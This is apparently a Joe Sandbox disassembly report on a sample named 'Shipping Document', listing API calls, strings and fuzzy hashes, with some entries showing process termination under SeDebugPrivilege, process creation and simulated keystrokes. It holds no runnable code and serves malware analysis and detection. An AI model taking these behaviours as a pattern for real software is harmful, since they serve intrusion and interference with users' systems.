                              APIs
                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FCFC06
                              • OleUninitialize.OLE32(?,00000000), ref: 00FCFCA5
                              • UnregisterHotKey.USER32(?), ref: 00FCFDFC
                              • DestroyWindow.USER32(?), ref: 01004A00
                              • FreeLibrary.KERNEL32(?), ref: 01004A65
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01004A92
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                              • String ID: close all
                              • API String ID: 469580280-3243417748
                              • Opcode ID: 3aeff553afe28915e030095c0d30327da908938913d8938afc716fc3f6df859e
                              • Instruction ID: 446da47fa6da12458685a4e63c76fdd7f1de48b163972a118f8a54300e14234a
                              • Opcode Fuzzy Hash: 3aeff553afe28915e030095c0d30327da908938913d8938afc716fc3f6df859e
                              • Instruction Fuzzy Hash: 5CA1CD317012138FDB2AEF14CA95F69F7A1BF04700F1442ADE94AAB292CB34AD56DF54
                              APIs
                              • EnumChildWindows.USER32(?,0101AA64), ref: 0101A9A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ChildEnumWindows
                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                              • API String ID: 3555792229-1603158881
                              • Opcode ID: 0215038d09b370ca31335d275327de10829f527c29a81b83b3f9178be62ad8ec
                              • Instruction ID: 2043d53cada96c10b37b45fdc4c39e621ca4b5d43cf6d52f2281d43233ca77b5
                              • Opcode Fuzzy Hash: 0215038d09b370ca31335d275327de10829f527c29a81b83b3f9178be62ad8ec
                              • Instruction Fuzzy Hash: F491A230A01687EBDB58EF64C881BEDFBB5BF04314F008159D9CAA7145DF386A99DB90
                              APIs
                              • SetWindowLongW.USER32(?,000000EB), ref: 00FC2EAE
                                • Part of subcall function 00FC1DB3: GetClientRect.USER32(?,?), ref: 00FC1DDC
                                • Part of subcall function 00FC1DB3: GetWindowRect.USER32(?,?), ref: 00FC1E1D
                                • Part of subcall function 00FC1DB3: ScreenToClient.USER32(?,?), ref: 00FC1E45
                              • GetDC.USER32 ref: 00FFCF82
                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FFCF95
                              • SelectObject.GDI32(00000000,00000000), ref: 00FFCFA3
                              • SelectObject.GDI32(00000000,00000000), ref: 00FFCFB8
                              • ReleaseDC.USER32(?,00000000), ref: 00FFCFC0
                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FFD04B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                              • String ID: U
                              • API String ID: 4009187628-3372436214
                              • Opcode ID: 785be575d9860315501aa33e2aff1377a363d9ac24e23a9c79ca01a62703c4c1
                              • Instruction ID: 595ffe933c7277aace115b234fd4c795e1c6e498151137c704106655649370cd
                              • Opcode Fuzzy Hash: 785be575d9860315501aa33e2aff1377a363d9ac24e23a9c79ca01a62703c4c1
                              • Instruction Fuzzy Hash: CE71D77180020EDFCF219F64C985BBA7BB6FF49360F144269EE959A1A9C7358C41FB60
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                                • Part of subcall function 00FC2344: GetCursorPos.USER32(?), ref: 00FC2357
                                • Part of subcall function 00FC2344: ScreenToClient.USER32(010867B0,?), ref: 00FC2374
                                • Part of subcall function 00FC2344: GetAsyncKeyState.USER32(00000001), ref: 00FC2399
                                • Part of subcall function 00FC2344: GetAsyncKeyState.USER32(00000002), ref: 00FC23A7
                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0104C2E4
                              • ImageList_EndDrag.COMCTL32 ref: 0104C2EA
                              • ReleaseCapture.USER32 ref: 0104C2F0
                              • SetWindowTextW.USER32(?,00000000), ref: 0104C39A
                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0104C3AD
                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0104C48F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                              • API String ID: 1924731296-2107944366
                              • Opcode ID: f7fd43a183ab800a8f0edb65e9d4354d04775a5365c04989e00a5623d153079a
                              • Instruction ID: d5e3ca9b30c0bd804530198ff6b8dfe830d0b7e38658d6267bd9dfe818491f2d
                              • Opcode Fuzzy Hash: f7fd43a183ab800a8f0edb65e9d4354d04775a5365c04989e00a5623d153079a
                              • Instruction Fuzzy Hash: 8751AEB4208306AFD710EF24CA96F6E7BE1FB88310F00452DF5D58B2A1DB7AA944DB51
                              APIs
                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0104F910), ref: 0103903D
                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0104F910), ref: 01039071
                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 010391EB
                              • SysFreeString.OLEAUT32(?), ref: 01039215
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                              • String ID:
                              • API String ID: 560350794-0
                              • Opcode ID: de5b004e0a63396dc9089a0f1307055ca1d982fdca3236f47bbeba11cac9a7af
                              • Instruction ID: 9b250065ba37dd12edeb21b8778df0499a8627d4cd7090f7e9c89276ee3be56f
                              • Opcode Fuzzy Hash: de5b004e0a63396dc9089a0f1307055ca1d982fdca3236f47bbeba11cac9a7af
                              • Instruction Fuzzy Hash: 9FF14D75A00109EFDF14DF98C888EAEB7B9FF89318F108099F556AB251CB71AE45CB50
                              APIs
                              • _memset.LIBCMT ref: 0103F9C9
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103FB5C
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103FB80
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103FBC0
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103FBE2
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0103FD5E
                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0103FD90
                              • CloseHandle.KERNEL32(?), ref: 0103FDBF
                              • CloseHandle.KERNEL32(?), ref: 0103FE36
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                              • String ID:
                              • API String ID: 4090791747-0
                              • Opcode ID: 4cc9ef8d7932e8a58cb6ac03cc0a9f2777dc9931e9fe90976f45cd01ea297810
                              • Instruction ID: ca9cc8ed1d3619a345700b387eb2a71871f220e71ca878d71529d5826c91a42a
                              • Opcode Fuzzy Hash: 4cc9ef8d7932e8a58cb6ac03cc0a9f2777dc9931e9fe90976f45cd01ea297810
                              • Instruction Fuzzy Hash: 25E1C0716043429FCB14EF28C985B6ABBE5AF84350F04845DF9DA8B2A2CB75DC45CB52
                              APIs
                                • Part of subcall function 010248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,010238D3,?), ref: 010248C7
                                • Part of subcall function 010248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,010238D3,?), ref: 010248E0
                                • Part of subcall function 01024CD3: GetFileAttributesW.KERNEL32(?,01023947), ref: 01024CD4
                              • lstrcmpiW.KERNEL32(?,?), ref: 01024FE2
                              • _wcscmp.LIBCMT ref: 01024FFC
                              • MoveFileW.KERNEL32(?,?), ref: 01025017
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                              • String ID:
                              • API String ID: 793581249-0
                              • Opcode ID: fc46d362a56b79e86d7176d56adf11e31cae33d627f4a8442fa4282258c18ac3
                              • Instruction ID: b16bddbcacc5f4da88aea597ace4b6d3276e0dfdbd5a0692744813fd1cdf85da
                              • Opcode Fuzzy Hash: fc46d362a56b79e86d7176d56adf11e31cae33d627f4a8442fa4282258c18ac3
                              • Instruction Fuzzy Hash: 555173B20083959BC764EB64DC85DDFB7ECAF84341F10492EF2C9D3151EE79A188876A
                              APIs
                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0104896E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: InvalidateRect
                              • String ID:
                              • API String ID: 634782764-0
                              • Opcode ID: eb54c13dbc352428e957a8988ec7546bbf8b667668430cccb9516e0dc6ab6497
                              • Instruction ID: fdd1258a5d379f6b62818efd2dfaf62844fbba4f026ad00a95c84815c56dda23
                              • Opcode Fuzzy Hash: eb54c13dbc352428e957a8988ec7546bbf8b667668430cccb9516e0dc6ab6497
                              • Instruction Fuzzy Hash: 1C51D3B0500205BBFF349EA8DCC5B9D7BA4FB04310F108967F694E61D1CBB5A990CB81
                              APIs
                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FFC547
                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FFC569
                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FFC581
                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FFC59F
                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FFC5C0
                              • DestroyIcon.USER32(00000000), ref: 00FFC5CF
                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FFC5EC
                              • DestroyIcon.USER32(?), ref: 00FFC5FB
                                • Part of subcall function 0104A71E: DeleteObject.GDI32(00000000), ref: 0104A757
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                              • String ID:
                              • API String ID: 2819616528-0
                              • Opcode ID: 6c3ef8b1eeac22143ea1a322110b2620695ea7422588e77e1d8841c72e57591d
                              • Instruction ID: 79717c661ef6cc9e0d53bab90e569baa839f3cf0004bb2b9aea3ce4b5edb87a1
                              • Opcode Fuzzy Hash: 6c3ef8b1eeac22143ea1a322110b2620695ea7422588e77e1d8841c72e57591d
                              • Instruction Fuzzy Hash: C7515A74A0020AAFDB24DF24CA46FAA37A5EF58360F140518F94697290DB75ED90EB90
                              APIs
                                • Part of subcall function 0101AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0101AE77
                                • Part of subcall function 0101AE57: GetCurrentThreadId.KERNEL32 ref: 0101AE7E
                                • Part of subcall function 0101AE57: AttachThreadInput.USER32(00000000,?,01019B65,?,00000001), ref: 0101AE85
                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 01019B70
                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 01019B8D
                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 01019B90
                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 01019B99
                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01019BB7
                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 01019BBA
                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 01019BC3
                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01019BDA
                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 01019BDD
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                              • String ID:
                              • API String ID: 2014098862-0
                              • Opcode ID: a867404daa0c4c8f83f9f691239d52f26709895196546cc0ddb9f90d2a3adef6
                              • Instruction ID: 0b8b06ac6d9fac8d6e4ed33df3a88409a1dcc1e22c380f2e344a3c9b95f71fd1
                              • Opcode Fuzzy Hash: a867404daa0c4c8f83f9f691239d52f26709895196546cc0ddb9f90d2a3adef6
                              • Instruction Fuzzy Hash: 1111E1B5A50219BFF6206B74DC89FAA3B6DEB4C795F100415F284AB094C9F75C10DBA4
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,01018A84,00000B00,?,?), ref: 01018E0C
                              • HeapAlloc.KERNEL32(00000000,?,01018A84,00000B00,?,?), ref: 01018E13
                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01018A84,00000B00,?,?), ref: 01018E28
                              • GetCurrentProcess.KERNEL32(?,00000000,?,01018A84,00000B00,?,?), ref: 01018E30
                              • DuplicateHandle.KERNEL32(00000000,?,01018A84,00000B00,?,?), ref: 01018E33
                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,01018A84,00000B00,?,?), ref: 01018E43
                              • GetCurrentProcess.KERNEL32(01018A84,00000000,?,01018A84,00000B00,?,?), ref: 01018E4B
                              • DuplicateHandle.KERNEL32(00000000,?,01018A84,00000B00,?,?), ref: 01018E4E
                              • CreateThread.KERNEL32(00000000,00000000,01018E74,00000000,00000000,00000000), ref: 01018E68
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                              • String ID:
                              • API String ID: 1957940570-0
                              • Opcode ID: 92df2292e70286867dd3ce00cbd5be44c9615afb89828029f29bc502ecb14473
                              • Instruction ID: d25ba754b7db1e1c069e249ac728c3b2dd0363fddfa30633de5e5ed087854a23
                              • Opcode Fuzzy Hash: 92df2292e70286867dd3ce00cbd5be44c9615afb89828029f29bc502ecb14473
                              • Instruction Fuzzy Hash: 1501BBB9240309BFE720ABA9DD8DF6B3BACEB89711F004411FA45DB195CA759800CB60
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Variant$ClearInit$_memset
                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                              • API String ID: 2862541840-625585964
                              • Opcode ID: eac271284911080ea0cb17c512566f430fd2fc7106ca52e2506b9b8f736cb622
                              • Instruction ID: 69037e3eadfd935f42c50054321875e6e3970365d691e873a8d7cd9525d09417
                              • Opcode Fuzzy Hash: eac271284911080ea0cb17c512566f430fd2fc7106ca52e2506b9b8f736cb622
                              • Instruction Fuzzy Hash: A191B371A00205EBDF25DFA5C844FAEBBBCEF89318F008559F555AB281D7B09944CFA0
                              APIs
                                • Part of subcall function 01017652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?,?,0101799D), ref: 0101766F
                                • Part of subcall function 01017652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 0101768A
                                • Part of subcall function 01017652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 01017698
                                • Part of subcall function 01017652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?), ref: 010176A8
                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01039B1B
                              • _memset.LIBCMT ref: 01039B28
                              • _memset.LIBCMT ref: 01039C6B
                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01039C97
                              • CoTaskMemFree.OLE32(?), ref: 01039CA2
                              Strings
                              • NULL Pointer assignment, xrefs: 01039CF0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                              • String ID: NULL Pointer assignment
                              • API String ID: 1300414916-2785691316
                              • Opcode ID: c27e5b83e6563094b2bf5372450a1b6bf3c82c3bdad5171df144c96732a6f441
                              • Instruction ID: ff7e6ef17cea125826480bd4366a456dd30b08dba23c9d6dd5cd8d2a490e043c
                              • Opcode Fuzzy Hash: c27e5b83e6563094b2bf5372450a1b6bf3c82c3bdad5171df144c96732a6f441
                              • Instruction Fuzzy Hash: 02917771D0022DEBDB10DFA5DC85EDEBBB8AF48710F20415AE509A7240DB75AA40CFA0
                              APIs
                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01047093
                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 010470A7
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 010470C1
                              • _wcscat.LIBCMT ref: 0104711C
                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 01047133
                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01047161
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$Window_wcscat
                              • String ID: SysListView32
                              • API String ID: 307300125-78025650
                              • Opcode ID: 5928bb40eaa78b3f2928363675f002a56495a4fa0b18bbe092fbc470451edcae
                              • Instruction ID: 97773ecc20b5ece0a198e24eade10d82465562a9c94f1dd27027b5e90543fb0c
                              • Opcode Fuzzy Hash: 5928bb40eaa78b3f2928363675f002a56495a4fa0b18bbe092fbc470451edcae
                              • Instruction Fuzzy Hash: 4F4191B5A00309EFEB219F68CC85BEE77E9EF08350F10057AF6C5A7192D77699848B50
                              APIs
                                • Part of subcall function 01023E91: CreateToolhelp32Snapshot.KERNEL32 ref: 01023EB6
                                • Part of subcall function 01023E91: Process32FirstW.KERNEL32(00000000,?), ref: 01023EC4
                                • Part of subcall function 01023E91: CloseHandle.KERNEL32(00000000), ref: 01023F8E
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103ECB8
                              • GetLastError.KERNEL32 ref: 0103ECCB
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103ECFA
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0103ED77
                              • GetLastError.KERNEL32(00000000), ref: 0103ED82
                              • CloseHandle.KERNEL32(00000000), ref: 0103EDB7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                              • String ID: SeDebugPrivilege
                              • API String ID: 2533919879-2896544425
                              • Opcode ID: 0a74a5ffc57d2d1c7d438bf631d7f834ff3cedea53f8c04def328bb32dc135b0
